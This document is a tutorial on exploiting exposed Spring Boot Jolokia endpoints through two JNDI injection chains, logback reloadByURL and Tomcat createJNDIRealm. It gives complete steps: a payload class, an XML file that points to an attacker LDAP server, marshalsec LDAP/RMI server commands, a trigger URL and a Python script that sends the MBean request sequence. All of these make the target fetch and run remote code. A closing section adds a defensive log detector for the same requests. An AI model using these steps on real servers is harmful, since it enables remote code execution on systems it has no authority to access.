Disclaimer: This article is for learning and reference only. All resources involved in it come from the Internet. Please do not use them for any illegal acts; otherwise you bear the consequences yourself, and I assume no legal or joint liability.
Vulnerability 1: jolokia logback JNDI RCE
Build environment
The vulnerability environment is:
https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-jolokia-logback-rce
Load the source code in IDEA and configure a Spring Boot run configuration to start the environment.
After the environment is running, visit the /jolokia interface
Conditions of use
The target exposes a /jolokia or /actuator/jolokia endpoint
The target uses the jolokia-core dependency (version requirements are not yet known) and the related MBeans exist in the environment
The target can reach the attacker's HTTP server (outbound requests to the external network are possible)
Standard JNDI injection depends on the target JDK version (LDAP works on jdk < 6u201/7u191/8u182/11.0.1), but in the relevant environments this restriction can be bypassed
How to use
1. View existing MBeans
Visit the /jolokia/list endpoint and check whether the keywords ch.qos.logback.classic.jmx.JMXConfigurator and reloadByURL are present.
2. Prepare the Java code to be executed
Write the Java code (Evil.java) used to verify that the vulnerability exists:
    public class Evil {
        public Evil() throws Exception {
            Runtime.getRuntime().exec("calc.exe");
        }
    }
Compile it in a way that is compatible with lower JDK versions:
javac -source 1.5 -target 1.5 Evil.java
Then copy the generated Evil.class file to the attacker VPS.
3. Host the XML file
Write the poc.xml file and put it in the same directory as Evil.class on the VPS:
    <configuration>
        <insertFromJNDI env-entry-name="ldap://your-vps-ip:1389/aaabbb" as="appName" />
    </configuration>
From the directory containing poc.xml, start a simple HTTP server with Python:
python3 -m http.server 8080
4. Set up the malicious LDAP service
Download marshalsec (https://github.com/mbechler/marshalsec) and use the following command to start the corresponding LDAP service:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:8080/#Evil 1389
5. Replace your-vps-ip with the actual address and visit the following URL to trigger the vulnerability:
/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/your-vps-ip!/poc.xml
As a result, the calculator pops up, indicating that the exploit was successful.
Vulnerability 2: jolokia Realm JNDI RCE
This vulnerability uses the same environment as Vulnerability 1.
Conditions of use
The target exposes a /jolokia or /actuator/jolokia endpoint
The target uses the jolokia-core dependency (version requirements are not yet known) and the related MBeans exist in the environment
The target can reach the attacker's server (outbound requests to the Internet are possible)
Standard JNDI injection depends on the target JDK version (RMI works on jdk < 6u141/7u131/8u121), but in the relevant environments this restriction can be bypassed
How to use
1. View existing MBeans
Visit the /jolokia/list endpoint and check whether the keywords type=MBeanFactory and createJNDIRealm are present.
2. Prepare the Java code to be executed
This step is the same as in Vulnerability 1 and is not repeated here.
3. Host the class file
From the directory containing Evil.class on the VPS, start a simple HTTP server:
python3 -m http.server 8080
4. Set up the malicious RMI service
Download marshalsec (https://github.com/mbechler/marshalsec) and use the following command to start the corresponding RMI service:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://your-vps-ip:8080/#Evil 1389
5. Send the malicious payload
Edit the target address, RMI address, port and other details in the springboot-realm-jndi-rce.py script to match the actual situation, then run it from a server you control.
    #!/usr/bin/env python3
    # coding: utf-8
    # Referer: https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txt
    import requests

    url = 'http://192.168.8.14:9094/jolokia'

    # Ask Tomcat's MBeanFactory to create a JNDI Realm under the Engine
    create_realm = {
        "mbean": "Tomcat:type=MBeanFactory",
        "type": "EXEC",
        "operation": "createJNDIRealm",
        "arguments": ["Tomcat:type=Engine"]
    }
    # Set the new Realm's JNDI context factory
    write_factory = {
        "mbean": "Tomcat:realmPath=/realm0,type=Realm",
        "type": "WRITE",
        "attribute": "contextFactory",
        "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"
    }
    # Point the Realm's connection URL at the RMI service started in step 4
    write_url = {
        "mbean": "Tomcat:realmPath=/realm0,type=Realm",
        "type": "WRITE",
        "attribute": "connectionURL",
        "value": "rmi://192.168.10.171:1389/Evil"
    }
    stop = {
        "mbean": "Tomcat:realmPath=/realm0,type=Realm",
        "type": "EXEC",
        "operation": "stop",
        "arguments": []
    }
    # Restarting the Realm makes it perform the JNDI lookup
    start = {
        "mbean": "Tomcat:realmPath=/realm0,type=Realm",
        "type": "EXEC",
        "operation": "start",
        "arguments": []
    }

    flow = [create_realm, write_factory, write_url, stop, start]
    for i in flow:
        print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute'))))
        r = requests.post(url, json=i)
        r.json()
        print(r.status_code)
Run python3 springboot-realm-jndi-rce.py on the VPS.
A calculator pops up on the target machine, and the exploit is successful.
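As an added detection example (not part of the original article or the referenced repositories), the following Python checks proxy or WAF request records for both chains described above: the GET-style reloadByURL call of Vulnerability 1 (with Jolokia's "!/" escaping undone) and the POST JSON sequence of Vulnerability 2. The tab-separated record format, the rule lists and the sample records are constructed for this example and are not a product rule set.

```python
import json
import re
from urllib.parse import unquote
# Jolokia operations/attributes used by the two chains on this page (hypothetical rule list for this example)
EXEC_OPS = {"reloadByURL", "createJNDIRealm"}
WRITE_ATTRS = {"contextFactory", "connectionURL"}
JNDI_URL = re.compile(r"\b(?:ldap|ldaps|rmi|iiop)://", re.IGNORECASE)

def jolokia_segments(path):
    # Jolokia GET arguments escape a literal '/' as '!/': split on unescaped slashes only, then unescape
    return [seg.replace("!/", "/") for seg in re.split(r"(?<!!)/", unquote(path))]

def classify_request(method, path, body=""):
    """Return findings for one request to a Jolokia endpoint ([] when nothing matched)."""
    findings, segs = [], jolokia_segments(path)
    # GET-style exec: /jolokia/exec/<mbean>/<operation>/<arguments...>
    if "exec" in segs:
        i = segs.index("exec")
        if len(segs) > i + 2 and segs[i + 2] in EXEC_OPS:
            findings.append("exec:" + segs[i + 2])
    # POST-style requests carry mbean/type/operation/attribute in a JSON body (single object or batch list)
    if method.upper() == "POST" and body:
        try:
            reqs = json.loads(body)
        except ValueError:
            reqs = []
        for req in (reqs if isinstance(reqs, list) else [reqs]):
            kind = str(req.get("type", "")).upper() if isinstance(req, dict) else ""
            if kind == "EXEC" and req.get("operation") in EXEC_OPS:
                findings.append("exec:" + req["operation"])
            elif kind == "WRITE" and req.get("attribute") in WRITE_ATTRS:
                findings.append("write:" + req["attribute"])
    # A JNDI URL anywhere in the request points at an attacker-controlled LDAP/RMI server
    if JNDI_URL.search("/".join(segs)) or JNDI_URL.search(body):
        findings.append("jndi-url")
    return findings

def scan_log(lines):
    """Scan tab-separated 'METHOD<TAB>PATH<TAB>BODY' records; return {line_no: findings} for hits only."""
    hits = {}
    for n, line in enumerate(lines, 1):
        method, path, body = (line.rstrip("\n").split("\t", 2) + ["", ""])[:3]
        if found := classify_request(method, path, body):
            hits[n] = found
    return hits
# Constructed sample records (not real traffic): one benign request, then both chains from this page
SAMPLE_LOG = [
    "GET\t/actuator/jolokia/list\t",
    "GET\t/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/203.0.113.10!/poc.xml\t",
    'POST\t/jolokia\t{"mbean": "Tomcat:type=MBeanFactory", "type": "EXEC", "operation": "createJNDIRealm", "arguments": ["Tomcat:type=Engine"]}',
    'POST\t/jolokia\t{"mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "WRITE", "attribute": "connectionURL", "value": "rmi://203.0.113.10:1389/Evil"}',
]
```

Any hit on reloadByURL or createJNDIRealm against an exposed actuator deserves an alert; the exposure itself is best removed by not publishing the jolokia endpoint at all.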